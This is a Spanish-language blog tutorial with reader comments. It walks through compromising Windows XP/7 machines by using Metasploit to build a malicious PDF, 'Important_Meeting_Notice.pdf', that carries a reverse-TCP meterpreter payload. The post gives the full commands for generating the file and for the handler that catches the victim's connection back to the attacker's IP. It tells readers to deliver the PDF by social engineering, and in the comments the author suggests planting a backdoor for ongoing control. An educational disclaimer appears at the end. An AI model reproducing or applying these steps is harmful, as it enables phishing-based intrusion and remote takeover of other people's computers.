jueves, 25 de octubre de 2012

Explotando Windows 7 - XP mediante PDF Escape desde Metasploit




En la actualidad como mucho de nosotros sabemos, la mayoría de las personas optan por usar el famosillo Sistema Operativo Windows, ya sea XP - 7 o la nueva que se lanzo hace poco el Windows 8, entonces es lógico que si usan Windows es por cosas de trabajo, estudio, diversión  etc. 

También es de conocimiento que Windows actualmente es vulnerable a cualquier ataque cibernetico, ya sea mediante exploits, vulnerabilidades, troyanos, etc, es por ello que muchos preferimos usar cualquier otro sistema que no sea Windows.

Pero ustedes se preguntaran ¿Porque Windows es tan Vulnerable?... Pues, porque nosotros mismos lo hacemos vulnerable!!! entonces ustedes dirán !Joder que Coña! si mis Firewall, Antivirus están actualizados! ... pues eso no tiene nada que ver, porque el sistema es explotado mediante las vulnerabilidades que tienen los programas que acostumbran a instalar diariamente, por ejemplo el  Adobe PDF, Microsoft Word, Ares, Reproductor de Windows, Winamp, VLC u otros, ¿Por que creen que las empresas actualizan sus Softwares (programas que usamos) semanalmente?... Porque, no es porque les guste... es con el fin de parchear las vulnerabilidades que se presentan diariamente en estos programas, y así "ayudan" a que el sistema sea un poco "seguro".


En este tutorial voy a demostrar como aprovecharnos de las vulnerabilidades que se presentan en los programas que tienen instalado un Sistema Operativo Windows 7 o XP, para asi tener el control total del sistema.

Para tal caso utilizare la vulnerabilidad Adobe PDF Escape EXE Social Engineering (No JavaScript) ya que casi el 95% (quizá) de los usuarios de Windows tienen instalado el Adobe Acrobat ya sea en su ordenador o notebook.

REQUERIMIENTOS:

  • Backtrack 5 R1 - R2 o R3 (Atacante)
  • Metasploit Framework (Atacante)
  • Windows XP - 7 (Victima)
  • Adobe Reader 9.1 (Victima)

PROCEDIMIENTOS:

Lo primero que tenemos que hacer es crear el PDF malicioso desde el Metasploit, dicho archivo sera enviado a nuestra victima usando Ing. Social para que logre abrirlo y así obtener acceso a su sistema.

Abrimos el Metasploit y tecleamos los siguientes comandos:

-------------------------------------------------------------------------------------------------------------
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs (Usar adobe pdf embedded exe exploit)
set payload windows/meterpreter/reverse_tcp (Payload que devolvera un Meterpreter)
set filename Important_Meeting_Notice.pdf (Creara el archivo PDF malicioso)
set lhost 192.168.1.17 (IP del Atacante) 
set lport 8080 (Puerto open de la Victima)
exploit
-------------------------------------------------------------------------------------------------------------


Después de haber generado el PDF malicioso con los comandos mencionados, se almacenera en la carpeta /root/.msf4/local/ si no logras ver la carpeta /.msf4/ teclea Ctrl+H y observeras dicha carpeta.

El siguiente paso es enviar el PDF malicioso generado a nuestra victima, ya sea por e-mail, link de descarga u otros métodos que se nos pueda ocurrir (Ing. Social).

Si logramos que nuestra victima acepte dicho archivo, inmediatamente abrimos nuevamente el Metasploit en otra consola para generar la conexión que recibiremos cuando la victima ejecute el PDF, ejecutando los siguientes comandos:

-------------------------------------------------------------------------------------------------------------
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set lport 8080 
set lhost 192.168.1.17  
exploit
-------------------------------------------------------------------------------------------------------------



Cuando la victima ejecuta el PDF malicioso, Adobe Acrobat le mostrara un mensaje preguntándole si desea ejecutar el archivo, como indica la siguiente imagen:



Después de que la victima haga clic en "Abrir" automáticamente recibiremos la conexión inversa en nuestra consola del Metasploit, tal cual se muestra en la siguiente imagen:



Y voila! hemos "owneado" el sistema de nuestra victima ;)


CONCLUSIÓN:

Después de haber realizado con éxito este ataque, se puede migrar el proceso explorer.exe en nuestra victima.

La versión vulnerable de este ataque es el Adobe Acrobat 9.1, por lo tanto si no queremos ser victima de dicho ataque, se recomienda actualizar a una versión mayor.

El tutorial es solo con fines EDUCATIVOS, cualquier uso malintencionado del mismo es responsabilidad entera de cada uno.

Recuerden solo practicar con fines de aprendizaje.

Un saludo y hasta la proxima ;)

12 comentarios:

  1. Maestro, en cuanto al PDF que abre la víctima finalmente no se ve nada después de hacer click? o se abre un PDF normal?

    Salu2

    ResponderEliminar
    Respuestas
    1. Hola,

      Cuando el usuario (victima) ejecute dicho archivo, le mostrara un mensaje sobre si desea abrirlo o no, si logra abrir el PDF, solo le mostrara una pagina en blanco ya que el PDF no contiene ninguna información mas que solo el exe malicioso que esta camuflado.

      Saludos.

      Eliminar
  2. Profe si la victima lo ejecuta puedo tener control todos los dias sin que este lo tenga que volver abrir?

    ResponderEliminar
    Respuestas
    1. Hola,

      La conexión inversa es hasta que el usuario (victima) mantenga su pc encendida, y también hasta que vos mantengas el meterpreter.

      Si deseas tener el control total al sistema, podes dejar un backdoor o una shell.

      Saludos.

      Eliminar
  3. can I use a ddns instead Ip address ?

    ResponderEliminar
    Respuestas
    1. We recommend using our internal IP.

      Greetings.

      Eliminar
  4. ok, but if i use a internal ip address ill be able to hack only a local network right ?
    thx

    ResponderEliminar
  5. Muy bueno :D Maestro un pregunta yo descarge la version del backtrack 5 r3 y en una memoria USB la tengo y configure la BIOS, al tiempo de arrancar pongo "startx" y no carga solo se pone una pantalla negra :S que puedo hacer maestro? Se lo agradeceria cordialmente :)

    ResponderEliminar
    Respuestas
    1. Hola,

      Eso ocurre por problemas Gráficos, lo que podes hacer es lo siguiente:

      1.- Cuando estes en el GRUB para elegir con que sistema arrancar, teclea la letra e
      2.- Busca esta linea "GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791" y agrega i915.modeset=1
      3.- Debe quedar asi: "GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791 i915.modeset=1"
      3.- Presionas ctrl + x para guardar los cambios.

      Saludos.

      Eliminar
  6. Maetro se me ocurre preguntar algo:

    si la victima ejecuta el pdf contaminado y al ver que esta en blanco lo cierra de imediato entonces
    todavia podemos desarrollar la segunda face del metasploit o sea la de establecer conexion siendo que el pdf ya ha sido cerrado digamos uno o dos minutos despues.

    gracias por la info, estoy preguntandome por los creadores de tanto sploit sera que no trabajan en algo formal.

    ResponderEliminar
    Respuestas
    1. :P no soy maetro, pero creo que puedo contestar tu pregunta, segun tengo entendido al momento de que la "victima" preciona el boton de abrir, el programa malicioso se ejecuta :P, independientemente de si el pdf sigue abierto, revisa en la maquina donde estes haciendo las ruebas los procesos antes y despues de abrir el pdf, para que veas el nuevo proceso :P

      ---S3rv1d0r6---

      Eliminar